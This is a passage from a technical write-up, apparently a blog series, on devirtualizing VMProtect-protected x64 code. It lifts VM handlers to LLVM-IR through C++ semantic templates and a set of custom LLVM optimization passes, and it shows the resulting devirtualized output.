We can see that the value is read from the stack using the same std::memcpy logic explained above, an undefined value is written to the current stack slot and the virtual stack pointer is incremented using the byte size of the template parameter. As in the previous case, the -O3 optimizations will take care of inlining and lowering the std::memcpy call.
ADD
Being a stack machine, we know that it is going to pop the two input operands from the top of the stack, add them together, calculate the updated flags and push the result and the flags back to the stack. There are four variations of the addition handler, meant to handle 8/16/32/64 bits operands, with the peculiarity that the 8 bits case is really popping 16 bits per operand off the stack and pushing a 16 bits result back to the stack to be consistent with the x64 push/pop alignment rules.
From what we just described the only thing we need is the virtual stack pointer, to be able to access the stack.
// ADD semantictemplate<typenameT>__attribute__((always_inline))__attribute__((const))boolAF(Tlhs,Trhs,Tres){returnAuxCarryFlag(lhs,rhs,res);}template<typenameT>__attribute__((always_inline))__attribute__((const))boolPF(Tres){returnParityFlag(res);}template<typenameT>__attribute__((always_inline))__attribute__((const))boolZF(Tres){returnZeroFlag(res);}template<typenameT>__attribute__((always_inline))__attribute__((const))boolSF(Tres){returnSignFlag(res);}template<typenameT>__attribute__((always_inline))__attribute__((const))boolCF_ADD(Tlhs,Trhs,Tres){returnCarry<tag_add>::Flag(lhs,rhs,res);}template<typenameT>__attribute__((always_inline))__attribute__((const))boolOF_ADD(Tlhs,Trhs,Tres){returnOverflow<tag_add>::Flag(lhs,rhs,res);}template<typenameT>__attribute__((always_inline))voidADD_FLAGS(size_t&flags,Tlhs,Trhs,Tres){// Calculate the flagsboolcf=CF_ADD(lhs,rhs,res);boolpf=PF(res);boolaf=AF(lhs,rhs,res);boolzf=ZF(res);boolsf=SF(res);boolof=OF_ADD(lhs,rhs,res);// Update the flagsUPDATE_EFLAGS(flags,cf,pf,af,zf,sf,of);}template<typenameT>__attribute__((always_inline))voidADD(size_t&vsp){// Check if it's 'byte' sizeboolisByte=(sizeof(T)==1);// Initialize the operandsTop1=0;Top2=0;// Fetch the operandsif(isByte){op1=Trunc(STACK_POP<uint16_t>(vsp));op2=Trunc(STACK_POP<uint16_t>(vsp));}else{op1=STACK_POP<T>(vsp);op2=STACK_POP<T>(vsp);}// Calculate the addTres=UAdd(op1,op2);// Calculate the flagssize_tflags=0;ADD_FLAGS(flags,op1,op2,res);// Save the resultif(isByte){STACK_PUSH<uint16_t>(vsp,ZExt(res));}else{STACK_PUSH<T>(vsp,res);}// 7. Save the flagsSTACK_PUSH<size_t>(vsp,flags);}DEFINE_SEMANTIC_64(ADD_64)=ADD<uint64_t>;DEFINE_SEMANTIC(ADD_32)=ADD<uint32_t>;DEFINE_SEMANTIC(ADD_16)=ADD<uint16_t>;DEFINE_SEMANTIC(ADD_8)=ADD<uint8_t>;
We can see that the function definition is templated with a T parameter that is internally used to generate the properly-sized stack accesses executed by the STACK_PUSH and STACK_POP helpers defined above. Additionally we are taking care of truncating and zero extending the special 8 bits case. Finally, after the unsigned addition took place, we rely on Remill’s semantically proven flag computations to calculate the fresh flags before pushing them to the stack.
The other binary and arithmetic operations are implemented following the same structure, with the correct operands access and flag computations.
PUSH_VMREG
This handler is meant to fetch the value stored in a VmRegister and push it to the stack. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are going to be the virtual stack pointer and the value of the VmRegister. The template is additionally defining the size of the pushed value and the offset from the VmRegister slot base.
template<size_tSize,size_tOffset>__attribute__((always_inline))voidPUSH_VMREG(size_t&vsp,VirtualRegistervmreg){// Update the stack pointervsp-=((Size!=8)?(Size/8):((Size/8)*2));// Select the proper element of the virtual registerifconstexpr(Size==64){std::memcpy(&RAM[vsp],&vmreg.qword,sizeof(uint64_t));}elseifconstexpr(Size==32){ifconstexpr(Offset==0){std::memcpy(&RAM[vsp],&vmreg.dword.d0,sizeof(uint32_t));}elseifconstexpr(Offset==1){std::memcpy(&RAM[vsp],&vmreg.dword.d1,sizeof(uint32_t));}}elseifconstexpr(Size==16){ifconstexpr(Offset==0){std::memcpy(&RAM[vsp],&vmreg.word.w0,sizeof(uint16_t));}elseifconstexpr(Offset==1){std::memcpy(&RAM[vsp],&vmreg.word.w1,sizeof(uint16_t));}elseifconstexpr(Offset==2){std::memcpy(&RAM[vsp],&vmreg.word.w2,sizeof(uint16_t));}elseifconstexpr(Offset==3){std::memcpy(&RAM[vsp],&vmreg.word.w3,sizeof(uint16_t));}}elseifconstexpr(Size==8){ifconstexpr(Offset==0){uint16_tbyte=ZExt(vmreg.byte.b0);std::memcpy(&RAM[vsp],&byte,sizeof(uint16_t));}elseifconstexpr(Offset==1){uint16_tbyte=ZExt(vmreg.byte.b1);std::memcpy(&RAM[vsp],&byte,sizeof(uint16_t));}// NOTE: there might be other offsets here, but they were not observed}}DEFINE_SEMANTIC(PUSH_VMREG_8_LOW)=PUSH_VMREG<8,0>;DEFINE_SEMANTIC(PUSH_VMREG_8_HIGH)=PUSH_VMREG<8,1>;DEFINE_SEMANTIC(PUSH_VMREG_16_LOWLOW)=PUSH_VMREG<16,0>;DEFINE_SEMANTIC(PUSH_VMREG_16_LOWHIGH)=PUSH_VMREG<16,1>;DEFINE_SEMANTIC_64(PUSH_VMREG_16_HIGHLOW)=PUSH_VMREG<16,2>;DEFINE_SEMANTIC_64(PUSH_VMREG_16_HIGHHIGH)=PUSH_VMREG<16,3>;DEFINE_SEMANTIC_64(PUSH_VMREG_32_LOW)=PUSH_VMREG<32,0>;DEFINE_SEMANTIC_32(POP_VMREG_32)=POP_VMREG<32,0>;DEFINE_SEMANTIC_64(PUSH_VMREG_32_HIGH)=PUSH_VMREG<32,1>;DEFINE_SEMANTIC_64(PUSH_VMREG_64)=PUSH_VMREG<64,0>;
We can see how the proper VmRegister sub-chunk is accessed based on the size and offset template parameters (e.g. vmreg.word.w1, vmreg.qword) and how once again the std::memcpy is used to implement a safe memory write on the indexed RAM array. The virtual stack pointer is also decremented as usual.
POP_VMREG
This handler is meant to pop a value from the stack and store it into a VmRegister. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are going to be the virtual stack pointer and a reference to the VmRegister to be updated. As before the template is defining the size of the popped value and the offset into the VmRegister slot.
template<size_tSize,size_tOffset>__attribute__((always_inline))voidPOP_VMREG(size_t&vsp,VirtualRegister&vmreg){// Fetch and store the value on the virtual registerifconstexpr(Size==64){uint64_tvalue=0;std::memcpy(&value,&RAM[vsp],sizeof(uint64_t));vmreg.qword=value;}elseifconstexpr(Size==32){ifconstexpr(Offset==0){uint32_tvalue=0;std::memcpy(&value,&RAM[vsp],sizeof(uint32_t));vmreg.qword=((vmreg.qword&0xFFFFFFFF00000000)|value);}elseifconstexpr(Offset==1){uint32_tvalue=0;std::memcpy(&value,&RAM[vsp],sizeof(uint32_t));vmreg.qword=((vmreg.qword&0x00000000FFFFFFFF)|UShl(ZExt(value),32));}}elseifconstexpr(Size==16){ifconstexpr(Offset==0){uint16_tvalue=0;std::memcpy(&value,&RAM[vsp],sizeof(uint16_t));vmreg.qword=((vmreg.qword&0xFFFFFFFFFFFF0000)|value);}elseifconstexpr(Offset==1){uint16_tvalue=0;std::memcpy(&value,&RAM[vsp],sizeof(uint16_t));vmreg.qword=((vmreg.qword&0xFFFFFFFF0000FFFF)|UShl(ZExtTo<uint64_t>(value),16));}elseifconstexpr(Offset==2){uint16_tvalue=0;std::memcpy(&value,&RAM[vsp],sizeof(uint16_t));vmreg.qword=((vmreg.qword&0xFFFF0000FFFFFFFF)|UShl(ZExtTo<uint64_t>(value),32));}elseifconstexpr(Offset==3){uint16_tvalue=0;std::memcpy(&value,&RAM[vsp],sizeof(uint16_t));vmreg.qword=((vmreg.qword&0x0000FFFFFFFFFFFF)|UShl(ZExtTo<uint64_t>(value),48));}}elseifconstexpr(Size==8){ifconstexpr(Offset==0){uint16_tbyte=0;std::memcpy(&byte,&RAM[vsp],sizeof(uint16_t));vmreg.byte.b0=Trunc(byte);}elseifconstexpr(Offset==1){uint16_tbyte=0;std::memcpy(&byte,&RAM[vsp],sizeof(uint16_t));vmreg.byte.b1=Trunc(byte);}// NOTE: there might be other offsets here, but they were not observed}// Clear the value on the stackifconstexpr(Size==64){uint64_tundef=UNDEF<uint64_t>();std::memcpy(&RAM[vsp],&undef,sizeof(uint64_t));}elseifconstexpr(Size==32){uint32_tundef=UNDEF<uint32_t>();std::memcpy(&RAM[vsp],&undef,sizeof(uint32_t));}elseifconstexpr(Size==16){uint16_tundef=UNDEF<uint16_t>();std::memcpy(&RAM[vsp],&undef,sizeof(uint16_t));}elseifconstexpr(Size==8){uint16_tundef=UNDEF<uint16_t>();std::memcpy(&RAM[vsp],&undef,sizeof(uint16_t));}// Update the stack pointervsp+=((Size!=8)?(Size/8):((Size/8)*2));}DEFINE_SEMANTIC(POP_VMREG_8_LOW)=POP_VMREG<8,0>;DEFINE_SEMANTIC(POP_VMREG_8_HIGH)=POP_VMREG<8,1>;DEFINE_SEMANTIC(POP_VMREG_16_LOWLOW)=POP_VMREG<16,0>;DEFINE_SEMANTIC(POP_VMREG_16_LOWHIGH)=POP_VMREG<16,1>;DEFINE_SEMANTIC_64(POP_VMREG_16_HIGHLOW)=POP_VMREG<16,2>;DEFINE_SEMANTIC_64(POP_VMREG_16_HIGHHIGH)=POP_VMREG<16,3>;DEFINE_SEMANTIC_64(POP_VMREG_32_LOW)=POP_VMREG<32,0>;DEFINE_SEMANTIC_64(POP_VMREG_32_HIGH)=POP_VMREG<32,1>;DEFINE_SEMANTIC_64(POP_VMREG_64)=POP_VMREG<64,0>;
In this case we can see that the update operation on the sub-chunks of the VmRegister is being done with some masking, shifting and zero extensions. This is to help LLVM with merging smaller integer values into a bigger integer value, whenever possible. As we saw in the STACK_POP operation, we are writing an undefined value to the current stack slot. Finally we are incrementing the virtual stack pointer.
LOAD and LOAD_GS
Generically speaking the LOAD handler is meant to pop an address from the stack, dereference it to load a value from one of the program segments and push the retrieved value to the top of the stack.
The following C++ snippet shows the implementation of a memory load from a generic memory pointer (e.g. SS or DS segments) and from the GS segment:
template<typenameT>__attribute__((always_inline))voidLOAD(size_t&vsp){// Check if it's 'byte' sizeboolisByte=(sizeof(T)==1);// Pop the addresssize_taddress=STACK_POP<size_t>(vsp);// Load the valueTvalue=0;std::memcpy(&value,&RAM[address],sizeof(T));// Save the resultif(isByte){STACK_PUSH<uint16_t>(vsp,ZExt(value));}else{STACK_PUSH<T>(vsp,value);}}DEFINE_SEMANTIC_64(LOAD_SS_64)=LOAD<uint64_t>;DEFINE_SEMANTIC(LOAD_SS_32)=LOAD<uint32_t>;DEFINE_SEMANTIC(LOAD_SS_16)=LOAD<uint16_t>;DEFINE_SEMANTIC(LOAD_SS_8)=LOAD<uint8_t>;DEFINE_SEMANTIC_64(LOAD_DS_64)=LOAD<uint64_t>;DEFINE_SEMANTIC(LOAD_DS_32)=LOAD<uint32_t>;DEFINE_SEMANTIC(LOAD_DS_16)=LOAD<uint16_t>;DEFINE_SEMANTIC(LOAD_DS_8)=LOAD<uint8_t>;template<typenameT>__attribute__((always_inline))voidLOAD_GS(size_t&vsp){// Check if it's 'byte' sizeboolisByte=(sizeof(T)==1);// Pop the addresssize_taddress=STACK_POP<size_t>(vsp);// Load the valueTvalue=0;std::memcpy(&value,&GS[address],sizeof(T));// Save the resultif(isByte){STACK_PUSH<uint16_t>(vsp,ZExt(value));}else{STACK_PUSH<T>(vsp,value);}}DEFINE_SEMANTIC_64(LOAD_GS_64)=LOAD_GS<uint64_t>;DEFINE_SEMANTIC(LOAD_GS_32)=LOAD_GS<uint32_t>;DEFINE_SEMANTIC(LOAD_GS_16)=LOAD_GS<uint16_t>;DEFINE_SEMANTIC(LOAD_GS_8)=LOAD_GS<uint8_t>;
By now the process should be clear. The only difference is the accessed zero-length array that will end up as base of the getelementptr instruction, which will directly reflect on the aliasing information that LLVM will be able to infer. The same kind of logic is applied to all the read or write memory accesses to the different segments.
DEFINE_SEMANTIC
In the code snippets of this section you may have noticed three macros named DEFINE_SEMANTIC_64, DEFINE_SEMANTIC_32 and DEFINE_SEMANTIC. They are the umpteenth trick borrowed from Remill and are meant to generate global variables with unmangled names, pointing to the function definition of the specialized template handlers. As an example, the ADD semantic definition for the 8/16/32/64 bits cases looks like this at the LLVM-IR level:
In the code snippets of this section you may also have noticed the usage of a function called UNDEF. This function is used to store a fictitious __undef value after each pop from the stack. This is done to signal to LLVM that the popped value is no longer needed after being popped from the stack.
The __undef value is modeled as a global variable, which during the first phase of the optimization pipeline will be used by passes like DSE to kill overlapping post-dominated dead stores and it’ll be replaced with a real undef value near the end of the optimization pipeline such that the related store instruction will be gone on the final optimized LLVM-IR function.
Lifting a basic block
We now have a bunch of templates, structures and helper functions, but how do we actually end up lifting some virtualized code?
The high level idea is the following:
A new LLVM-IR function with the HelperStub signature is generated;
The function’s body is populated with call instructions to the VmHandler helper functions fed with the proper arguments (obtained from the HelperStub parameters);
The optimization pipeline is executed on the function, resulting in the inlining of all the helper functions (that are marked always_inline) and in the propagation of the values;
The updated state of the VmRegisters, VmPassingSlots and stores to the segments is optimized, removing most of the obfuscation patterns used by VMProtect;
The updated state of the virtual stack pointer and virtual instruction pointer is computed.
A fictitious example of a full pipeline based on the HelperStub function, implemented at the C++ level and optimized to obtain propagated LLVM-IR code follows:
The C++ HelperStub function with calls to the handlers. This only serves as an example, normally the LLVM-IR for this is automatically generated from VM bytecode.
The LLVM-IR of the HelperStub function with inlined and optimized calls to the handlers
The last snippet is representing all the semantic computations related with a VmBlock, as described in the high level overview. Although, if the code we lifted is capturing the whole semantics related with a VmStub, we can wrap the HelperStub function with the HelperFunction function, which enforces the liveness properties described in the Liveness and aliasing information section, enabling us to obtain only the computations updating the host execution context:
extern"C"size_tSimpleExample_HelperFunction(rptrrax,rptrrbx,rptrrcx,rptrrdx,rptrrsi,rptrrdi,rptrrbp,rptrrsp,rptrr8,rptrr9,rptrr10,rptrr11,rptrr12,rptrr13,rptrr14,rptrr15,rptrflags,size_tKEY_STUB,size_tRET_ADDR,size_tREL_ADDR){// Allocate the temporary virtual registersVirtualRegistervmregs[30]={0};// Allocate the temporary passing slotssize_tslots[30]={0};// Initialize the virtual registerssize_tvsp=rsp;size_tvip=0;// Force the relocation address to 0REL_ADDR=0;// Execute the virtualized codevip=SimpleExample_HelperStub(rax,rbx,rcx,rdx,rsi,rdi,rbp,rsp,r8,r9,r10,r11,r12,r13,r14,r15,flags,KEY_STUB,RET_ADDR,REL_ADDR,vsp,vip,vmregs,slots);// Return the next address(es)returnvip;}
The C++ HelperFunction function with the call to the HelperStub function and the relevant stack frame allocations.
The LLVM-IR HelperFunction function with fully optimized code.
It can be seen that the example is just pushing the values of the registers rax and rbx, loading them in vmregs[0] and vmregs[1] respectively, pushing the VmRegisters on the stack, adding them together, popping the updated flags in vmregs[2], popping the addition’s result to vmregs[3] and finally pushing vmregs[3] on the stack to be popped in the rax register at the end. The liveness of the values of the VmRegisters ends with the end of the function, hence the updated flags saved in vmregs[2] won’t be reflected on the host execution context. Looking at the final snippet we can see that the semantics of the code have been successfully obtained.
What’s next?
In Part 2 we’ll put the described structures and helpers to good use, digging into the details of the virtualized CFG exploration and introducing the basics of the LLVM optimization pipeline.
This post will introduce 7 custom passes that, once added to the optimization pipeline, will make the overall LLVM-IR output more readable. Some words will be spent on the unsupported instructions lifting and recompilation topics. Finally, the output of 6 devirtualized functions will be shown.
Custom passes
This section will give an overview of some custom passes meant to:
Solve VMProtect specific optimization problems;
Solve some limitations of existing LLVM passes, but that won’t meet the same quality standard of an official LLVM pass.
SegmentsAA
This pass falls under the category of the VMProtect specific optimization problems and is probably the most delicate of the section, as it may be feeding LLVM with unsafe assumptions. The aliasing information described in the Liveness and aliasing information section will finally come in handy. In fact, the goal of the pass is to identify the type of two pointers and determine if they can be deemed as not aliasing with one another.
With the structures defined in the previous sections, LLVM is already able to infer that two pointers derived from the following sources don’t alias with one another:
general purpose registers
VmRegisters
VmPassingSlots
GS zero-sized array
FS zero-sized array
RAM zero-sized array (with constant index)
RAM zero-sized array (with symbolic index)
Additionally LLVM can also discern between pointers with RAM base using a simple symbolic index. For example an access to [rsp - 0x10] (local stack slot) will be considered as NoAlias when compared with an access to [rsp + 0x10] (incoming stack argument).
But LLVM’s alias analysis passes fall short when handling pointers using as base the RAM array and employing a more convoluted symbolic index, and the reason for the shortcoming is entirely related to the lack of type and context information that got lost during the compilation to binary.
The pass is inspired by existing implementations (1, 2, 3) that are basing their checks on the identification of pointers belonging to different segments and address spaces.
Slicing the symbolic index used in a RAM array access we can discern with high confidence between the following additional NoAlias memory accesses:
indirect access: if the access is a stack argument ([rsp] or [rsp + positive_constant_offset + symbolic_offset]), a dereferenced general purpose register ([rax]) or a nested dereference (val1 = [rax], val2 = [val1]); identified as TyIND in the code;
local stack slot: if the access is of the form [rsp - positive_constant_offset + symbolic_offset]; identified as TySS in the code;
local stack array: if the access if of the form [rsp - positive_constant_offset + phi_index]; identified as TyARR in the code.
If the pointer type cannot be reliably detected, an unknown type (identified as TyUNK in the code) is being used, and the comparison between the pointers is automatically skipped. If the pass cannot return a NoAlias result, the query is passed back to the default alias analysis pipeline.
One could argue that the pass is not really needed, as it is unlikely that the propagation of the sensitive information we need to successfully explore the virtualized CFG is hindered by aliasing issues. In fact, the computation of a conditional branch at the end of a VmBlock is guaranteed not to be hindered by a symbolic memory store happening before the jump VmHandler accesses the branch destination. But there are some cases where VMProtect pushes the address of the next VmStub in one of the first VmBlocks, doing memory stores in between and accessing the pushed value only in one or more VmExits. That could be a case where discerning between a local stack slot and an indirect access enables the propagation of the pushed address.
Irregardless of the aforementioned issue, that can be solved with some ad-hoc store-to-load detection logic, playing around with the alias analysis information that can be fed to LLVM could make the devirtualized code more readable. We have to keep in mind that there may be edge cases where the original code is breaking our assumptions, so having at least a vague idea of the involved pointers accessed at runtime could give us more confidence or force us to err on the safe side, relying solely on the built-in LLVM alias analysis passes.
The assembly snippet shown below has been devirtualized with and without adding the SegmentsAA pass to the pipeline. If we are sure that at runtime, before the push rax instruction, rcx doesn’t contain the value rsp - 8 (extremely unexpected on benign code), we can safely enable the SegmentsAA pass and obtain a cleaner output.
The devirtualized code without the SegmentsAA pass added to the pipeline and therefore no assumptions fed to LLVM
Alias analysis is a complex topic, and experience thought me that most of the propagation issues happening while using LLVM to deobfuscate some code are related to the LLVM’s alias analysis passes being hinder by some pointer computation. Therefore, having the capability to feed LLVM with context-aware information could be the only way to handle certain types of obfuscation. Beware that other tools you are used to are most likely doing similar “safe” assumptions under the hood (e.g. concolic execution tools using the concrete pointer to answer the aliasing queries).
The takeaway from this section is that, if needed, you can define your own alias analysis callback pass to be integrated in the optimization pipeline in such a way that pre-existing passes can make use of the refined aliasing query results. This is similar to updating IDA’s stack variables with proper type definitions to improve the propagation results.
KnownIndexSelect
This pass falls under the category of the VMProtect specific optimization problems. In fact, whoever looked into VMProtect 3.0.9 knows that the following trick, reimplemented as high level C code for simplicity, is being internally used to select between two branches of a conditional jump.
uint64_tConditionalBranchLogic(uint64_tRFLAGS){// Extracting the ZF flag bituint64_tConditionBit=(RFLAGS&0x40)>>6;// Writing the jump destinationsuint64_tStack[2]={0};Stack[0]=5369966919;Stack[1]=5369966790;// Selecting the correct jump destinationreturnStack[ConditionBit];}
What is really happening at the low level is that the branch destinations are written to adjacent stack slots and then a conditional load, controlled by the previously computed flags, is going to select between one slot or the other to fetch the right jump destination.
LLVM doesn’t automatically see through the conditional load, but it is providing us with all the needed information to write such an optimization ourselves. In fact, the ValueTracking analysis exposes the computeKnownBits function that we can use to determine if the index used in a getelementptr instruction is bound to have just two values.
At this point we can generate two separated load instructions accessing the stack slots with the inferred indices and feed them to a select instruction controlled by the index itself. At the next store-to-load propagation, LLVM will happily identify the matching store and load instructions, propagating the constants representing the conditional branch destinations and generating a nice select instruction with second and third constant operands.
The snippet above shows the matched pattern, its exploded form suitable for the LLVM propagation and its final optimized shape. In this case the ValueTracking analysis provided the values 0 and 8 as the only feasible ones for the %index value.
A brief discussion about this pass can be found in this chain of messages in the LLVM mailing list.
SynthesizeFlags
This pass falls in between the categories of the VMProtect specific optimization problems and LLVM optimization limitations. In fact, this pass is based on the enumerative synthesis logic implemented by Souper, with some minor tweaks to make it more performant for our use-case.
This pass exists because I’m lazy and the fewer ad-hoc patterns I write, the happier I am. The patterns we are talking about are the ones generated by the flag manipulations that VMProtect does when computing the condition for a conditional branch. LLVM already does a good job with simplifying part of the patterns, but to obtain mint-like results we absolutely need to help it a bit.
There’s not much to say about this pass, it is basically invoking Souper’s enumerative synthesis with a selected set of components (Inst::CtPop, Inst::Eq, Inst::Ne, Inst::Ult, Inst::Slt, Inst::Ule, Inst::Sle, Inst::SAddO, Inst::UAddO, Inst::SSubO, Inst::USubO, Inst::SMulO, Inst::UMulO), requiring the synthesis of a single instruction, enabling the data-flow pruning option and bounding the LHS candidates to a maximum of 50. Additionally the pass is executing the synthesis only on the i1 conditions used by the select and br instructions.
This Godbolt page shows the devirtualized LLVM-IR output obtained appending the SynthesizeFlags pass to the pipeline and the resulting assembly with the properly recompiled conditional jumps. The original assembly code can be seen below. It’s a dummy sequence of instructions where the key piece is the comparison between the rax and rbx registers that drives the conditional branch jcc.
This pass falls under the category of the generic LLVM optimization passes that couldn’t possibly be included in the mainline framework because they wouldn’t match the quality criteria of a stable pass. Although the transformations done by this pass are applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.
Passes like DSE already attempt to handle the case where a store instruction is partially or completely overlapping with other store instructions. Although the more convoluted case of multiple stores contributing to the value of a single memory slot are somehow only partially handled.
This pass is focusing on the handling of the case illustrated in the following snippet, where multiple smaller stores contribute to the creation of a bigger value subsequently accessed by a single load instruction.
Now, you can arm yourself with patience and manually match all the store and load operations, or you can trust me when I tell you that all of them are concurring to the creation of a single i64 value that will be finally saved in the rax register.
The pass is working at the intra-block level and it’s relying on the analysis results provided by the MemorySSA, ScalarEvolution and AAResults interfaces to backward walk the definition chains concurring to the creation of the value fetched by each load instruction in the block. Doing that, it is filling a structure which keeps track of the aliasing store instructions, the stored values, and the offsets and sizes overlapping with the memory slot fetched by each load. If a sequence of store assignments completely defining the value of the whole memory slot is found, the chain is processed to remove the store-to-load indirection. Subsequent passes may then rely on this new indirection-free chain to apply more transformations. As an example the previous LLVM-IR snippet turns in the following optimized LLVM-IR snippet when the MemoryCoalescing pass is applied before executing the InstCombine pass. Nice huh?
This pass also falls under the category of the generic LLVM optimization passes that couldn’t possibly be included in the mainline framework because they wouldn’t match the quality criteria of a stable pass. Although the transformations done by this pass are applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.
Conceptually similar to the MemoryCoalescing pass, the goal of this pass is to sweep a function to identify chains of store instructions that post-dominate a single store instruction and kill its value before it is actually being fetched. Passes like DSE are doing a similar job, although limited to some forms of full overlapping caused by multiple stores on a single post-dominated store.
Applying the -O3 pipeline to the following example won’t remove the first 64 bits dead store at RAM[%0], even if the subsequent 64 bits stores at RAM[%0 - 4] and RAM[%0 + 4] fully overlap it, redefining its value.
Adding the PartialOverlapDSE pass to the pipeline will identify and kill the first store, enabling other passes to eventually kill the chain of computations contributing to the stored value. The built-in DSE pass is most likely not executing such a kill because collecting information about multiple overlapping stores is an expensive operation.
PointersHoisting
This pass is strictly related to the IsGuaranteedLoopInvariant patch I submitted, in fact it is just identifying all the pointers that could be safely hoisted to the entry block because depending solely on values coming directly from the entry block. Applying this kind of transformation prior to the execution of the DSE pass may lead to better optimization results.
As an example, consider this devirtualized function containing a rather useless switch case. I’m saying rather useless because each store in the case blocks is post-dominated and killed by the store i32 22, i32* %85 instruction, but LLVM is not going to kill those stores until we move the pointer computation to the entry block.
When the PointersHoisting pass is applied before executing the DSE pass we obtain the following code, where the switch case has been completely removed because it has been deemed dead.
This pass falls under the category of the generic LLVM optimization passes that are useful when dealing with obfuscated code, but basically useless, at least in the current shape, in a standard compilation pipeline. In fact, it’s not uncommon to find obfuscated code relying on constants stored in data sections added during the protection phase.
As an example, on some versions of VMProtect, when the Ultra mode is used, the conditional branch computations involve dummy constants fetched from a data section. Or if we think about a virtualized jump table (e.g. generated by a switch in the original binary), we also have to deal with a set of constants fetched from a data section.
Hence the reason for having a custom pass that, during the execution of the pipeline, identifies potential constant data accesses and converts the associated memory load into an LLVM constant (or chain of constants). This process can be referred to as constant(s) concretization.
The pass is going to identify all the load memory accesses in the function and determine if they fall in the following categories:
A constantexpr memory load that is using an address contained in one of the binary sections; this case is what you would hit when dealing with some kind of data-based obfuscation;
A symbolic memory load that is using as base an address contained in one of the binary sections and as index an expression that is constrained to a limited amount of values; this case is what you would hit when dealing with a jump table.
In both cases the user needs to provide a safe set of memory ranges that the pass can consider as read-only, otherwise the pass will restrict the concretization to addresses falling in read-only sections in the binary.
In the first case, the address is directly available and the associated value can be resolved simply parsing the binary.
In the second case the expression computing the symbolic memory access is sliced, the constraint(s) coming from the predecessor block(s) are harvested and Souper is queried in an incremental way (conceptually similar to the one used while solving the outgoing edges in a VmBlock) to obtain the set of addresses accessing the binary. Each address is then verified to be really laying in a binary section and the corresponding value is fetched. At this point we have a unique mapping between each address and its value, that we can turn into a selection cascade, illustrated in the following LLVM-IR snippet:
; Fetching the switch control value from [rsp + 40]%2=addi64%rsp,40%3=getelementptrinbounds[0xi8],[0xi8]*@RAM,i640,i64%2%4=bitcasti8*%3toi32*%72=loadi32,i32*%4,align1; Computing the symbolic address%84=zexti32%72toi64%85=shlnuwnswi64%84,1%86=andi64%85,4294967296%87=subnswi64%84,%86%88=shlnswi64%87,2%89=addnswi64%88,5368964976; Generated selection cascade%90=icmpeqi64%89,5368964988%91=icmpeqi64%89,5368964980%92=icmpeqi64%89,5368964984%93=icmpeqi64%89,5368964992%94=icmpeqi64%89,5368964996%95=selecti1%90,i642442748,i641465288%96=selecti1%91,i64650651,i64%95%97=selecti1%92,i642740242,i64%96%98=selecti1%93,i641706770,i64%97%99=selecti1%94,i641510355,i64%98
The %99 value will hold the proper constant based on the address computed by the %89 value. The example above represents the lifted jump table shown in the next snippet, where you can notice the jump table base 0x14003E770 (5368964976) and the corresponding addresses and values:
If we have a peek at the sliced jump condition implementing the virtualized switch case (below), this is how it looks after the ConstantConcretization pass has been scheduled in the pipeline and further InstCombine executions updated the selection cascade to compute the switch case addresses. Souper will therefore be able to identify the 6 possible outgoing edges, leading to the devirtualized switch case presented in the PointersHoisting section:
; Fetching the switch control value from [rsp + 40]%2=addi64%rsp,40%3=getelementptrinbounds[0xi8],[0xi8]*@RAM,i640,i64%2%4=bitcasti8*%3toi32*%72=loadi32,i32*%4,align1; Computing the symbolic address%84=zexti32%72toi64%85=shlnuwnswi64%84,1%86=andi64%85,4294967296%87=subnswi64%84,%86%88=shlnswi64%87,2%89=addnswi64%88,5368964976; Generated selection cascade%90=icmpeqi64%89,5368964988%91=icmpeqi64%89,5368964980%92=icmpeqi64%89,5368964984%93=icmpeqi64%89,5368964992%94=icmpeqi64%89,5368964996%95=selecti1%90,i645371151872,i645370415894%96=selecti1%91,i645369359775,i64%95%97=selecti1%92,i645371449366,i64%96%98=selecti1%93,i645370174412,i64%97%99=selecti1%94,i645370219479,i64%98%100=calli64@HelperKeepPC(i64%99)#15
Unsupported instructions
It is well known that all the virtualization-based protectors support only a subset of the targeted ISA. Thus, when an unsupported instruction is found, an exit from the virtual machine is executed (context switching to the host code), running the unsupported instruction(s) and re-entering the virtual machine (context switching back to the virtualized code).
The UnsupportedInstructionsLiftingToLLVM proof-of-concept is an attempt to lift the unsupported instructions to LLVM-IR, generating an InlineAsm instruction configured with the set of clobbering constraints and (ex|im)plicitly accessed registers. An execution context structure representing the general purpose registers is employed during the lifting to feed the inline assembly call instruction with the loaded registers, and to store the updated registers after the inline assembly execution.
This approach guarantees a smooth connection between two virtualized VmStubs and an intermediate sequence of unsupported instructions, enabling some of the LLVM optimizations and a better registers allocation during the recompilation phase.
An example of the lifted unsupported instruction rdtsc follows:
I haven’t really explored the recompilation in depth so far, because my main objective was to obtain readable LLVM-IR code, but some considerations follow:
If the goal is being able to execute, and eventually decompile, the recovered code, then compiling the devirtualized function using the layer of indirection offered by the general purpose register pointers is a valid way to do so. It is conceptually similar to the kind of indirection used by Remill with its own State structure. SATURN employs this technique when the stack slots and arguments recovery cannot be applied.
If the goal is to achieve a 1:1 register allocation, then things get more complicated because one can’t simply map all the general purpose register pointers to the hardware registers hoping for no side-effect to manifest.
The major issue to deal with when attempting a 1:1 mapping is related to how the recompilation may unexpectedly change the stack layout. This could happen if, during the register allocation phase, some spilling slot is allocated on the stack. If these additional spilling+reloading semantics are not adequately handled, some pointers used by the function may access unforeseen stack slots with disastrous results.
Results showcase
The following log files contain the output of the PoC tool executed on functions showcasing different code constructs (e.g. loop, jump table) and accessing different data structures (e.g. GS segment, DS segment, KUSER_SHARED_DATA structure):
0x140001d10@DevirtualizeMe1: calling KERNEL32.dll::GetTickCount64 and literally included as nostalgia kicked in;
0x140001e60@DevirtualizeMe2: executing an unsupported cpuid and with some nicely recovered llvm.fshl.i64 intrinsic calls used as rotations;
0x140001d20@DevirtualizeMe2: calling ADVAPI32.dll::GetUserNameW and with a nicely recovered llvm.bswap.i64 intrinsic call;
0x13001334@EMP: DllEntryPoint, calling another internal function (intra-call);
0x1301d000@EMP: calling KERNEL32.dll::LoadLibraryA, KERNEL32.dll::GetProcAddress, calling other internal functions (intra-calls), executing several unsupported cpuid instructions;
0x130209c0@EMP: accessing KUSER_SHARED_DATA and with nicely synthesized conditional jumps;
0x1400044c0@Switches64: executing the CPUID handler and devirtualized with PointersHoisting disabled to preserve the switch case.
Searching for the @F_ pattern in your favourite text editor will bring you directly to each devirtualized VmStub, immediately preceded by the textual representation of the recovered CFG.
Afterword
